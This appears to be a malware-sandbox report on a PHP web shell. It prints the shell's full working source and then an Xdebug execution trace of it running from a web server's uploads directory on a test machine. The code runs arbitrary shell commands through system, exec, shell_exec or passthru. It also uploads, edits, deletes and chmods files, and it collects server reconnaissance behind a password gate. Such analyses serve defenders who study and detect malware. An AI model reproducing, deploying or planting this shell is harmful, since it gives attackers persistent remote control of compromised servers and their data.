Jump to:
Screenshot
Attributes
Environment
<?php
error_reporting(0);
$xyn = 'tunafeesh';
if (isset($_POST['pass'])) {
if ($_POST['pass'] == $password) {
setcookie($xyn, $_POST['pass'], time() + 3600);
}
let_him_in();
}
if (!empty($password) && !isset($_COOKIE[$xyn]) or $_COOKIE[$xyn] != $password) {
initiate();
die;
}
$me = basename("/var/www/html/duh.php.60602a67e46b1e1fef70be6bc80d1cef.bin");
$server_soft = $_SERVER["SERVER_SOFTWARE"];
$uname = php_uname();
$cur_user = get_current_user() . ' uid:' . getmyuid() . ' gid:' . getmygid();
$safe_mode = ini_get('safe_mode');
$safe_mode = $safe_mode ? '<font color:crimson>ON</font>' : '<font color=#ccff00>OFF</font>';
$cwd = getcwd();
$bckC = '#333333';
$txtC = '#999999';
$start = '<html><head><title>' . getenv('HTTP_HOST') . ' </title><style>body {background:' . $bckC . ';color:' . $txtC . ';font-size:9pt;font-family:Trebuchet MS,cursive,sans serif;}h1#n{position:fixed;top:10px;left:10px;text-shadow:0px 0px 5px black;color:#79a317;}h1#nm{text-shadow:0px 0px 5px black;color:#79a317;}a {color:' . $txtC . ';text-decoration:none;font-family:Comic Sans Ms,cursive,sans serif;}a:hover {color:#79a317;}hr {background:' . $txtC . ';color:black;}p#bck{position:fixed;top:20px;right:20px;}#menu {position:fixed;bottom:0px;width:100%;font-size:13pt;}#menuB {background:' . $bckC . ';box-shadow:0px 0px 10px black;border-radius:15px;padding:5px 20px 5px 20px;}table#moreI{font-size:9pt;background:' . $bckC . ';border-radius:10px;box-shadow:0px 0px 10px black;padding:5px;position:fixed;bottom:40px;right:40px;display:none;}p#cp {font-size:11pt;}table#lt {font-size:10pt;}input#lt,input#sv {background:' . $bckC . ';border-radius:10px;border:1px solid ' . $txtC . ';color:' . $txtC . ';text-align:center;}input#ltb {background:rgba(0,0,0,0);border-radius:10px;color:' . $txtC . ';box-shadow:0px 0px 1px ' . $txtC . ';border:0px solid rgba(0,0,0,0);}table#ft {font-size:9pt;padding:5px;border-radius:10px;box-shadow:0px 0px 10px black;}td#fh {border-bottom:1px solid ' . $txtC . ';padding-bottom:3px;}tr#fn:hover{box-shadow:0px 0px 5px black;}h3 {text-shadow:0px 0px 4px black;font-size:13pt;}textarea#edit {background:' . $bckC . ';color:' . $txtC . ';box-shadow:0px 0px 10px black;border-radius:10px;border:none;padding:10px;}</style><script type="text/javascript">function get_inf() {if(document.getElementById(\'moreI\').style.display=="block"){document.getElementById(\'moreI\').style.display="none"}else {document.getElementById(\'moreI\').style.display="block";}} function xyn(id1,id2) {document.getElementById(id1).style.display="block";document.getElementById(id2).style.display="none";}</script></head><body><h1 id="n"><a href="?x=x"></a></h1>';
$menu = '<center><p id="menu"><span id="menuB"><<a href="' . $me . '">Home</a>> <<a href="?x=cmd&d="' . realpath('.') . '">Command</a>> <<a href="?x=php&d="' . realpath('.') . '">PHP</a>> <<a href="javascript:get_inf();">Info</a>> <<a href="?x=q">Logout</a>> </span></p></center>';
$end = '</body></html>';
$inf = '<center><p id="inf">||| <b><i><u>Software:</u></i></b> ' . $server_soft . ' ||| <b><i><u>Uname:</u></i></b> ' . $uname . ' |||</br>||| <b><i><u>User:</u></i></b> ' . $cur_user . ' ||| <b><i><u>Safe Mode:</u></i></b> ' . $safe_mode . ' ||| <b><i><u>Directory: </i></b></u>' . $cwd . ' |||</p></center><hr>';
print $start;
print $menu;
print $inf;
$moreI = array('PHP Version' => phpversion(), 'Zend Version' => zend_version(), 'Magic Quotes' => magic_quotes(), 'Curl' => curl(), 'Register Globals' => reg_globals(), 'OpenBase Dir' => openbase_dir(), 'MySQL' => myql(), 'Gzip' => gzip(), 'MsSQL' => mssql(), 'PostgreSQL' => postgresql(), 'Oracle' => oracle(), 'Total Space' => h_size(disk_total_space('/')), 'Used Space' => h_size(disk_free_space('/')), 'Your IP' => $_SERVER['REMOTE_ADDR'], 'Server IP' => $_SERVER['SERVER_ADDR']);
print "<table id=\"moreI\">";
foreach ($moreI as $n => $v) {
print '<td>' . $n . '</td><td> :> </td><td> ' . $v . '</td><tr>';
}
print "<td colspan=3 align=\"center\"><a href=\"?x=phpinf\" target=\"_blank\">PHPInfo</a></td></table>";
if (isset($_GET['d'])) {
chdir($_GET['d']);
}
if (isset($_REQUEST['x'])) {
print '<p id="bck"><a href="?d=' . realpath('.') . '">BACK</a></p>';
switch ($_REQUEST['x']) {
case 'c':
if (isset($_POST['edit_form'])) {
$f = $_GET['f'];
$e = fopen($f, 'w') or print "<p id=\"nn\">Error Opening File</p>";
fwrite($e, $_POST['edit_form']) or print "<p id=\"nn\">Couldn't Save File</p>";
fclose($e);
}
print '<center><p>Editing ' . $_GET['f'] . ' (' . perms($_GET['d'] . $_GET['f']) . ') .</p></br></br><form action="?x=c&d=' . realpath('.') . '&f=' . $_GET['f'] . '" method="POST"><textarea cols=90 rows=15 name="edit_form" id="edit">';
if (file_exists($_GET['f'])) {
$c = file($_GET['f']);
foreach ($c as $l) {
print htmlspecialchars($l);
}
}
print "</textarea></br></br><input type=\"submit\" value=\"Save\" id=\"sv\"></form></center>";
break;
case 'cmd':
print '</br></br><center><h3>Execute Command</h3><form action="?x=cmd&d=' . realpath('.') . '" method="POST"><input type="text" value="" name="cmd" id="lt"> <input type="submit" value="Go" id="lt"></form></br><textarea cols=90 rows=15 id="edit">';
if (isset($_POST['cmd'])) {
$cmd = $_POST['cmd'];
execute(exec_meth(), $cmd);
}
print "</textarea></center>";
break;
case 'php':
print '</br></br><center><h3>PHP Code</h3><form action=?x=php&d="' . realpath('.') . '" method="POST"><input type="text" value="" name="pcode" id="lt"> <input type="submit" value="Go" id="lt"></form></br><textarea cols=90 rows=15 id="edit">';
print "</textarea></center>";
break;
case 'phpinf':
phpinfo();
break;
case 'q':
setcookie($xyn, '', time() - 3600);
let_him_in();
break;
case 'x':
print "</br></br></br><center><h1 id=\"nm\"></h1><h3>Mail: <a href=\"mailto:>COM\"></a></h3><h3>Twitter: <a href=\"http://www.twitter.com/X0MB13_\" target=\"_blank\"></a></h3><h3>Facebook: <a href=\"http://www.fb.com/xombie.xombie.7\" target=\"_blank\">X0MB13</a></h3></center>";
break;
}
} else {
if (isset($_GET['d'])) {
chdir($_GET['d']);
}
if (isset($_GET['ndir'])) {
$d = $_GET['d'];
$n = $_GET['ndir'];
mkdir($d . DIRECTORY_SEPARATOR . $n);
}
if (isset($_POST['new'])) {
$n = $_POST['new'];
$o = $_POST['old'];
$d = $_POST['d'];
rename($d . DIRECTORY_SEPARATOR . $o, $d . DIRECTORY_SEPARATOR . $n);
}
if (isset($_GET['deld'])) {
$d = $_GET['deld'];
rmdir($d);
}
if (isset($_GET['delf'])) {
$d = $_GET['delf'];
unlink($d);
}
if (isset($_GET['ch'])) {
$ch = $_GET['ch'];
$d = $_GET['df'];
chmod($d, $ch);
}
if (isset($_FILES['upfile']['name'])) {
$d = realpath('.') . DIRECTORY_SEPARATOR . basename($_FILES['upfile']['name']);
move_uploaded_file($_FILES['upfile']['tmp_name'], $d);
}
print '<p align="center" id="cp">' . curpath('') . '</p>';
print '<table width=90% align="center" id="lt"cellpadding="0"><td align="center"><form action="?d=' . realpath('.') . '" method="GET">Create Dir: <input type="hidden" name="d" value="' . realpath('.') . '" id="lt"><input type="text" value="" name="ndir" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?d="' . realpath('.') . '" method="GET">Create File: <input type="hidden" value="' . realpath('.') . '" name="d" id="lt"><input type="hidden" value="c" name="x"><input type="text" value="" name="f" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?x=cmd&d=' . realpath('.') . '" method="POST">Command: <input type="text" value="" name="cmd" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?d=' . realpath('.') . '" method="POST" enctype="multipart/form-data">Upload: <input type="hidden" value="100000000" name="MAX_FILE_SIZE"><input type="file" name="upfile" id="ltb"> <input type="submit" value="Go" id="lt"></form></td></table>';
print "</br>";
$filex = array();
$dirx = array();
print "<table width=\"75%\" align=\"center\" id=\"ft\" ><td id=\"fh\"><b>Name</b></td><td id=\"fh\" align=\"center\"><b>Permissions</b></td><td id=\"fh\" align=\"center\"><b>Owner</b></td><td id=\"fh\" align=\"center\"><b>Options</b></td><tr id=\"fn\">";
if ($handle = opendir('.')) {
while (false !== ($file = readdir($handle))) {
if (is_dir($file)) {
$dirx[] .= $file;
} else {
$filex[] .= $file;
}
}
asort($filex);
asort($dirx);
$i = 0;
foreach ($dirx as $file) {
if (function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) {
$own = posix_getpwuid(fileowner($file));
$grp = posix_getgrgid(filegroup($file));
} else {
$own['name'] = '???';
$grp['name'] = '???';
}
print '<td id="fc"><span id="n' . $file . '"><a href="?d=' . realpath($file) . '">' . $file . '</a></span><span id="r' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="POST"><input type="hidden" value="' . realpath('.') . '" name="d"> <input type="text" value="' . $file . '" id="lt" name="new"><input type="hidden" value="' . $file . '" name="old"> <input type="submit" id="lt" value="Rename"> <input type="button" id="lt" value="Cancel" onClick="xyn(\'n' . $file . '\',\'r' . $file . '\');"></form></span><span id="d' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="GET">Are you Sure?<input type="hidden" value="' . realpath($file) . '" name="deld"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onClick="xyn(\'n' . $file . '\',\'d' . $file . '\')"></form></span></td><td id="fc" align="center"><span id="h' . $file . '"><a href="javascript:xyn(\'c' . $file . '\',\'h' . $file . '\');"><font color="' . get_color($file) . '">' . perms($file) . '</font></a></span><span id="c' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="GET"><input type="hidden" value="' . realpath($file) . '" name="df"><input type="text" value="' . perms($file) . '" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onClick="xyn(\'h' . $file . '\',\'c' . $file . '\');"></form></span></td><td id="fc" align="center">' . $own['name'] . ' : ' . $grp['name'] . '</td>';
if ($i == 0 or $i == 1) {
print "<td id=\"fc\"></td><tr id=\"fn\">";
} else {
print '<td id="fc" align="center"><a href="javascript:xyn(\'r' . $file . '\',\'n' . $file . '\')">[R]</a> <a href="javascript:xyn(\'d' . $file . '\',\'n' . $file . '\')">[D]</a></td><tr id="fn">';
}
$i++;
}
foreach ($filex as $file) {
if (function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) {
$own = posix_getpwuid(fileowner($file));
$grp = posix_getgrgid(filegroup($file));
} else {
$own['name'] = '???';
$grp['name'] = '???';
}
print '<td id="fc"><span id="n' . $file . '"><a href="?x=c&d=' . realpath('.') . '&f=' . $file . '">' . $file . '</a></span><span id="r' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="POST"><input type="hidden" value="' . realpath('.') . '" name="d"> <input type="text" id="lt" value="' . $file . '" name="new"><input type="hidden" value="' . $file . '" name="old"><input type="submit" id="lt" value="Rename"><input type="button" id="lt" value="Cancel" onClick="xyn(\'n' . $file . '\',\'r' . $file . '\');"></form></span><span id="d' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="GET">Are you Sure?<input type="hidden" value="' . realpath($file) . '" name="delf"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onClick="xyn(\'n' . $file . '\',\'d' . $file . '\')"></form></span></td><td id="fc" align="center"><span id="h' . $file . '"><a href="javascript:xyn(\'c' . $file . '\',\'h' . $file . '\');"><font color="' . get_color($file) . '">' . perms($file) . '</font></a></span><span id="c' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="GET"><input type="hidden" value="' . realpath($file) . '" name="df"><input type="text" value="' . perms($file) . '" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onClick="xyn(\'h' . $file . '\',\'c' . $file . '\');"></form></span></td><td id="fc" align="center">' . $own['name'] . ' : ' . $grp['name'] . '</td><td id="fc" align="center"><a href="javascript:xyn(\'r' . $file . '\',\'n' . $file . '\')">[R]</a> <a href="javascript:xyn(\'d' . $file . '\',\'n' . $file . '\');">[D]</a></td><tr id="fn">';
}
}
print "</table></br></br></br>";
}
function openbase_dir()
{
$x = ini_get('open_basedir');
if (!$x) {
$o = '<font color=#ccff00>OFF</font>';
} else {
$o = '<font color=crimson>ON</font>';
}
return $o;
}
function magic_quotes()
{
$x = get_magic_quotes_gpc();
if (empty($x)) {
$m = '<font color=#ccff00>OFF</font>';
} else {
$m = '<font color=crimson>ON</font>';
}
return $m;
}
function curl()
{
if (extension_loaded('curl')) {
$c = '<font color=crimson>ON</font>';
} else {
$c = '<font color=#ccff00>OFF</font>';
}
return $c;
}
function reg_globals()
{
if (ini_get('reqister_globals')) {
$r = '<font color=crimson>ON</font>';
} else {
$r = '<font color=#ccff00>OFF</font>';
}
return $r;
}
function oracle()
{
if (function_exists('ocilogon')) {
$o = '<font color=crimson>ON</font>';
} else {
$o = '<font color=#ccff00>OFF</font>';
}
return $o;
}
function postgresql()
{
if (function_exists('pg_connect')) {
$p = '<font color=crimson>ON</font>';
} else {
$p = '<font color=#ccff00>OFF</font>';
}
return $p;
}
function myql()
{
if (function_exists('mysql_connect')) {
$m = '<font color=crimson>ON</font>';
} else {
$m = '<font color=#ccff00>OFF</font>';
}
return $m;
}
function mssql()
{
if (function_exists('mssql_connect')) {
$m = '<font color=crimson>ON</font>';
} else {
$m = '<font color=#ccff00>OFF</font>';
}
return $m;
}
function gzip()
{
if (function_exists('gzencode')) {
$m = '<font color=crimson>ON</font>';
} else {
$m = '<font color=#ccff00>OFF</font>';
}
return $m;
}
function h_size($s)
{
if ($s >= 1073741824) {
$s = round($s / 1073741824 * 100) / 100 . 'GB';
} elseif ($s >= 1048576) {
$s = round($s / 1048576 * 100) / 100 . 'MB';
} elseif ($s >= 1024) {
$s = round($s / 1024 * 100) / 100 . 'KB';
} else {
$s .= 'B';
}
return $s;
}
function curpath($d)
{
if ($d == '') {
$d = getcwd();
}
$p = '';
$n = '';
$dx = explode(DIRECTORY_SEPARATOR, $d);
for ($i = 0; $i < count($dx); $i++) {
$g = $dx[$i];
$p .= $dx[$i] . DIRECTORY_SEPARATOR;
$n .= '<a href="?d=' . $p . '">' . $g . '</a>' . DIRECTORY_SEPARATOR;
}
return $n;
}
function get_color($f)
{
if (is_writable($f)) {
$c = '#ccff00';
}
if (!is_writable($f) && is_readable($f)) {
$c = '' . $txtC . '';
}
if (!is_writable($f) && !is_readable($f)) {
$c = 'crimson';
}
return $c;
}
function perms($f)
{
if (file_exists($f)) {
return substr(sprintf('%o', fileperms($f)), -4);
} else {
return "???";
}
}
function exec_meth()
{
if (function_exists('passthru')) {
$m = 'passthru';
}
if (function_exists('exec')) {
$m = 'exec';
}
if (function_exists('shell_exec')) {
$m = 'shell_exec';
}
if (function_exists('system')) {
$m = 'system';
}
if (!isset($m)) {
$m = 'Disabled';
}
return $m;
}
function execute($m, $c)
{
if ($m == 'passthru') {
passthru($c);
} elseif ($m == 'system') {
system($c);
} elseif ($m == 'shell_exec') {
print shell_exec($c);
} elseif ($m == 'exec') {
exec($c, $r);
foreach ($r as $o) {
print $o . '</br>';
}
} else {
print "dafuq?";
}
}
function initiate()
{
print '<table border=0 width=100% height=100% align=center style="background:#333333;color:silver;"><td valign="middle"><center><form action="' . basename("/var/www/html/duh.php.60602a67e46b1e1fef70be6bc80d1cef.bin") . '" method="POST">Password <input type="password" maxlength="10" name="pass" style="background:#333333;color:silver;border-radius:10px;border:1px solid silver;text-align:center;"> <input type="submit" value=">>" style="background:#333333;color:silver;border-radius:10px;border:1px solid silver;"></form></center></td></table>';
}
function let_him_in()
{
header("Location: " . basename("/var/www/html/duh.php.60602a67e46b1e1fef70be6bc80d1cef.bin"));
}
print $end;
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:34:03.874223]
1 0 1 0.000141 393512
1 3 0 0.000682 487616 {main} 1 /var/www/html/uploads/duh.phar 0 0
2 4 0 0.000701 487616 error_reporting 0 /var/www/html/uploads/duh.phar 2 1 0
2 4 1 0.000716 487656
2 4 R 22527
1 A /var/www/html/uploads/duh.phar 3 $xyn = 'tunafeesh'
2 5 0 0.000747 487616 basename 0 /var/www/html/uploads/duh.phar 6 1 '/var/www/html/uploads/duh.phar'
2 5 1 0.000763 487688
2 5 R 'duh.phar'
1 A /var/www/html/uploads/duh.phar 6 $me = 'duh.phar'
1 A /var/www/html/uploads/duh.phar 6 $server_soft = 'Apache/2.4.52 (Ubuntu)'
2 6 0 0.000800 487656 php_uname 0 /var/www/html/uploads/duh.phar 6 0
2 6 1 0.000814 487768
2 6 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1 A /var/www/html/uploads/duh.phar 6 $uname = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2 7 0 0.000848 487768 get_current_user 0 /var/www/html/uploads/duh.phar 6 0
2 7 1 0.000882 487808
2 7 R 'osboxes'
2 8 0 0.000897 487816 getmyuid 0 /var/www/html/uploads/duh.phar 6 0
2 8 1 0.000910 487816
2 8 R 1000
2 9 0 0.000930 487824 getmygid 0 /var/www/html/uploads/duh.phar 6 0
2 9 1 0.000941 487824
2 9 R 1000
1 A /var/www/html/uploads/duh.phar 6 $cur_user = 'osboxes uid:1000 gid:1000'
2 10 0 0.000965 487832 ini_get 0 /var/www/html/uploads/duh.phar 6 1 'safe_mode'
2 10 1 0.000979 487864
2 10 R FALSE
1 A /var/www/html/uploads/duh.phar 6 $safe_mode = FALSE
1 A /var/www/html/uploads/duh.phar 6 $safe_mode = '<font color=#ccff00>OFF</font>'
2 11 0 0.001014 487832 getcwd 0 /var/www/html/uploads/duh.phar 6 0
2 11 1 0.001027 487880
2 11 R '/var/www/html/uploads'
1 A /var/www/html/uploads/duh.phar 6 $cwd = '/var/www/html/uploads'
1 A /var/www/html/uploads/duh.phar 6 $bckC = '#333333'
1 A /var/www/html/uploads/duh.phar 6 $txtC = '#999999'
2 12 0 0.001070 487880 getenv 0 /var/www/html/uploads/duh.phar 7 1 'HTTP_HOST'
2 12 1 0.001089 487952
2 12 R 'localhost'
1 A /var/www/html/uploads/duh.phar 7 $start = '<html><head><title>localhost </title><style>body {background:#333333;color:#999999;font-size:9pt;font-family:Trebuchet MS,cursive,sans serif;}h1#n{position:fixed;top:10px;left:10px;text-shadow:0px 0px 5px black;color:#79a317;}h1#nm{text-shadow:0px 0px 5px black;color:#79a317;}a {color:#999999;text-decoration:none;font-family:Comic Sans Ms,cursive,sans serif;}a:hover {color:#79a317;}hr {background:#999999;color:black;}p#bck{position:fixed;top:20px;right:20px;}#menu {position:fixed;bottom:0px;width:100%;font-'
2 13 0 0.001132 490056 realpath 0 /var/www/html/uploads/duh.phar 8 1 '.'
2 13 1 0.001146 490136
2 13 R '/var/www/html/uploads'
2 14 0 0.001160 490120 realpath 0 /var/www/html/uploads/duh.phar 8 1 '.'
2 14 1 0.001173 490200
2 14 R '/var/www/html/uploads'
1 A /var/www/html/uploads/duh.phar 8 $menu = '<center><p id="menu"><span id="menuB"><<a href="duh.phar">Home</a>> <<a href="?x=cmd&d="/var/www/html/uploads">Command</a>> <<a href="?x=php&d="/var/www/html/uploads">PHP</a>> <<a href="javascript:get_inf();">Info</a>> <<a href="?x=q">Logout</a>> </span></p></center>'
1 A /var/www/html/uploads/duh.phar 8 $end = '</body></html>'
1 A /var/www/html/uploads/duh.phar 8 $inf = '<center><p id="inf">||| <b><i><u>Software:</u></i></b> Apache/2.4.52 (Ubuntu) ||| <b><i><u>Uname:</u></i></b> Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 |||</br>||| <b><i><u>User:</u></i></b> osboxes uid:1000 gid:1000 ||| <b><i><u>Safe Mode:</u></i></b> <font color=#ccff00>OFF</font> ||| <b><i><u>Directory: </i></b></u>/var/www/html/uploads |||</p></center><hr>'
2 15 0 0.001247 490696 phpversion 0 /var/www/html/uploads/duh.phar 10 0
2 15 1 0.001261 490760
2 15 R '7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
2 16 0 0.001282 491456 zend_version 0 /var/www/html/uploads/duh.phar 10 0
2 16 1 0.001294 491488
2 16 R '3.2.0'
2 17 0 0.001308 491488 magic_quotes 1 /var/www/html/uploads/duh.phar 10 0
3 18 0 0.001319 491488 get_magic_quotes_gpc 0 /var/www/html/uploads/duh.phar 46 0
3 18 1 0.001332 491488
3 18 R FALSE
2 A /var/www/html/uploads/duh.phar 46 $x = FALSE
2 A /var/www/html/uploads/duh.phar 46 $m = '<font color=#ccff00>OFF</font>'
2 17 1 0.001371 491488
2 17 R '<font color=#ccff00>OFF</font>'
2 19 0 0.001387 491488 curl 1 /var/www/html/uploads/duh.phar 10 0
3 20 0 0.001406 491488 extension_loaded 0 /var/www/html/uploads/duh.phar 47 1 'curl'
3 20 1 0.001423 491528
3 20 R TRUE
2 A /var/www/html/uploads/duh.phar 47 $c = '<font color=crimson>ON</font>'
2 19 1 0.001448 491488
2 19 R '<font color=crimson>ON</font>'
2 21 0 0.001463 491488 reg_globals 1 /var/www/html/uploads/duh.phar 10 0
3 22 0 0.001474 491488 ini_get 0 /var/www/html/uploads/duh.phar 48 1 'reqister_globals'
3 22 1 0.001490 491520
3 22 R FALSE
2 A /var/www/html/uploads/duh.phar 48 $r = '<font color=#ccff00>OFF</font>'
2 21 1 0.001516 491488
2 21 R '<font color=#ccff00>OFF</font>'
2 23 0 0.001531 491488 openbase_dir 1 /var/www/html/uploads/duh.phar 10 0
3 24 0 0.001544 491488 ini_get 0 /var/www/html/uploads/duh.phar 45 1 'open_basedir'
3 24 1 0.001561 491520
3 24 R ''
2 A /var/www/html/uploads/duh.phar 45 $x = ''
2 A /var/www/html/uploads/duh.phar 45 $o = '<font color=#ccff00>OFF</font>'
2 23 1 0.001595 491488
2 23 R '<font color=#ccff00>OFF</font>'
2 25 0 0.001649 491488 myql 1 /var/www/html/uploads/duh.phar 10 0
3 26 0 0.001661 491488 function_exists 0 /var/www/html/uploads/duh.phar 51 1 'mysql_connect'
3 26 1 0.001674 491528
3 26 R FALSE
2 A /var/www/html/uploads/duh.phar 51 $m = '<font color=#ccff00>OFF</font>'
2 25 1 0.001699 491488
2 25 R '<font color=#ccff00>OFF</font>'
2 27 0 0.001713 491488 gzip 1 /var/www/html/uploads/duh.phar 10 0
3 28 0 0.001724 491488 function_exists 0 /var/www/html/uploads/duh.phar 53 1 'gzencode'
3 28 1 0.001738 491528
3 28 R TRUE
2 A /var/www/html/uploads/duh.phar 53 $m = '<font color=crimson>ON</font>'
2 27 1 0.001761 491488
2 27 R '<font color=crimson>ON</font>'
2 29 0 0.001776 491488 mssql 1 /var/www/html/uploads/duh.phar 10 0
3 30 0 0.001787 491488 function_exists 0 /var/www/html/uploads/duh.phar 52 1 'mssql_connect'
3 30 1 0.001800 491528
3 30 R FALSE
2 A /var/www/html/uploads/duh.phar 52 $m = '<font color=#ccff00>OFF</font>'
2 29 1 0.001823 491488
2 29 R '<font color=#ccff00>OFF</font>'
2 31 0 0.001838 491488 postgresql 1 /var/www/html/uploads/duh.phar 10 0
3 32 0 0.001849 491488 function_exists 0 /var/www/html/uploads/duh.phar 50 1 'pg_connect'
3 32 1 0.001861 491528
3 32 R FALSE
2 A /var/www/html/uploads/duh.phar 50 $p = '<font color=#ccff00>OFF</font>'
2 31 1 0.001885 491488
2 31 R '<font color=#ccff00>OFF</font>'
2 33 0 0.001900 491488 oracle 1 /var/www/html/uploads/duh.phar 10 0
3 34 0 0.001911 491488 function_exists 0 /var/www/html/uploads/duh.phar 49 1 'ocilogon'
3 34 1 0.001923 491528
3 34 R FALSE
2 A /var/www/html/uploads/duh.phar 49 $o = '<font color=#ccff00>OFF</font>'
2 33 1 0.001946 491488
2 33 R '<font color=#ccff00>OFF</font>'
2 35 0 0.001960 491488 disk_total_space 0 /var/www/html/uploads/duh.phar 10 1 '/'
2 35 1 0.001976 491520
2 35 R 232015802368
2 36 0 0.001991 491488 h_size 1 /var/www/html/uploads/duh.phar 10 1 232015802368
3 37 0 0.002005 491488 round 0 /var/www/html/uploads/duh.phar 54 1 21608.155441284
3 37 1 0.002018 491520
3 37 R 21608
2 A /var/www/html/uploads/duh.phar 54 $s = '216.08GB'
2 36 1 0.002043 491528
2 36 R '216.08GB'
2 38 0 0.002057 491528 disk_free_space 0 /var/www/html/uploads/duh.phar 10 1 '/'
2 38 1 0.002070 491560
2 38 R 208891867136
2 39 0 0.002084 491528 h_size 1 /var/www/html/uploads/duh.phar 10 1 208891867136
3 40 0 0.002096 491528 round 0 /var/www/html/uploads/duh.phar 54 1 19454.571151733
3 40 1 0.002109 491560
3 40 R 19455
2 A /var/www/html/uploads/duh.phar 54 $s = '194.55GB'
2 39 1 0.002133 491568
2 39 R '194.55GB'
1 A /var/www/html/uploads/duh.phar 10 $moreI = ['PHP Version' => '7.2.34-37+ubuntu22.04.1+deb.sury.org+1', 'Zend Version' => '3.2.0', 'Magic Quotes' => '<font color=#ccff00>OFF</font>', 'Curl' => '<font color=crimson>ON</font>', 'Register Globals' => '<font color=#ccff00>OFF</font>', 'OpenBase Dir' => '<font color=#ccff00>OFF</font>', 'MySQL' => '<font color=#ccff00>OFF</font>', 'Gzip' => '<font color=crimson>ON</font>', 'MsSQL' => '<font color=#ccff00>OFF</font>', 'PostgreSQL' => '<font color=#ccff00>OFF</font>', 'Oracle' => '<font color=#ccff00>OFF</font>', 'Total Space' => '216.08GB', 'Used Space' => '194.55GB', 'Your IP' => '127.0.0.1', 'Server IP' => '127.0.0.1']
1 A /var/www/html/uploads/duh.phar 10 $n = 'PHP Version'
1 A /var/www/html/uploads/duh.phar 10 $n = 'Zend Version'
1 A /var/www/html/uploads/duh.phar 10 $n = 'Magic Quotes'
1 A /var/www/html/uploads/duh.phar 10 $n = 'Curl'
1 A /var/www/html/uploads/duh.phar 10 $n = 'Register Globals'
1 A /var/www/html/uploads/duh.phar 10 $n = 'OpenBase Dir'
1 A /var/www/html/uploads/duh.phar 10 $n = 'MySQL'
1 A /var/www/html/uploads/duh.phar 10 $n = 'Gzip'
1 A /var/www/html/uploads/duh.phar 10 $n = 'MsSQL'
1 A /var/www/html/uploads/duh.phar 10 $n = 'PostgreSQL'
1 A /var/www/html/uploads/duh.phar 10 $n = 'Oracle'
1 A /var/www/html/uploads/duh.phar 10 $n = 'Total Space'
1 A /var/www/html/uploads/duh.phar 10 $n = 'Used Space'
1 A /var/www/html/uploads/duh.phar 10 $n = 'Your IP'
1 A /var/www/html/uploads/duh.phar 10 $n = 'Server IP'
2 41 0 0.002338 491568 curpath 1 /var/www/html/uploads/duh.phar 34 1 ''
3 42 0 0.002351 491568 getcwd 0 /var/www/html/uploads/duh.phar 55 0
3 42 1 0.002364 491616
3 42 R '/var/www/html/uploads'
2 A /var/www/html/uploads/duh.phar 55 $d = '/var/www/html/uploads'
2 A /var/www/html/uploads/duh.phar 55 $p = ''
2 A /var/www/html/uploads/duh.phar 55 $n = ''
3 43 0 0.002406 491616 explode 0 /var/www/html/uploads/duh.phar 55 2 '/' '/var/www/html/uploads'
3 43 1 0.002421 492192
3 43 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2 A /var/www/html/uploads/duh.phar 55 $dx = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2 A /var/www/html/uploads/duh.phar 55 $i = 0
2 A /var/www/html/uploads/duh.phar 55 $g = ''
2 A /var/www/html/uploads/duh.phar 55 $p .= '/'
2 A /var/www/html/uploads/duh.phar 55 $n .= '<a href="?d=/"></a>/'
2 A /var/www/html/uploads/duh.phar 55 $i++
2 A /var/www/html/uploads/duh.phar 55 $g = 'var'
2 A /var/www/html/uploads/duh.phar 55 $p .= 'var/'
2 A /var/www/html/uploads/duh.phar 55 $n .= '<a href="?d=/var/">var</a>/'
2 A /var/www/html/uploads/duh.phar 55 $i++
2 A /var/www/html/uploads/duh.phar 55 $g = 'www'
2 A /var/www/html/uploads/duh.phar 55 $p .= 'www/'
2 A /var/www/html/uploads/duh.phar 55 $n .= '<a href="?d=/var/www/">www</a>/'
2 A /var/www/html/uploads/duh.phar 55 $i++
2 A /var/www/html/uploads/duh.phar 55 $g = 'html'
2 A /var/www/html/uploads/duh.phar 55 $p .= 'html/'
2 A /var/www/html/uploads/duh.phar 55 $n .= '<a href="?d=/var/www/html/">html</a>/'
2 A /var/www/html/uploads/duh.phar 55 $i++
2 A /var/www/html/uploads/duh.phar 55 $g = 'uploads'
2 A /var/www/html/uploads/duh.phar 55 $p .= 'uploads/'
2 A /var/www/html/uploads/duh.phar 55 $n .= '<a href="?d=/var/www/html/uploads/">uploads</a>/'
2 A /var/www/html/uploads/duh.phar 55 $i++
2 41 1 0.002644 491760
2 41 R '<a href="?d=/"></a>/<a href="?d=/var/">var</a>/<a href="?d=/var/www/">www</a>/<a href="?d=/var/www/html/">html</a>/<a href="?d=/var/www/html/uploads/">uploads</a>/'
2 44 0 0.002664 491568 realpath 0 /var/www/html/uploads/duh.phar 35 1 '.'
2 44 1 0.002678 491648
2 44 R '/var/www/html/uploads'
2 45 0 0.002692 491792 realpath 0 /var/www/html/uploads/duh.phar 35 1 '.'
2 45 1 0.002705 491872
2 45 R '/var/www/html/uploads'
2 46 0 0.002720 491952 realpath 0 /var/www/html/uploads/duh.phar 35 1 '.'
2 46 1 0.002732 492032
2 46 R '/var/www/html/uploads'
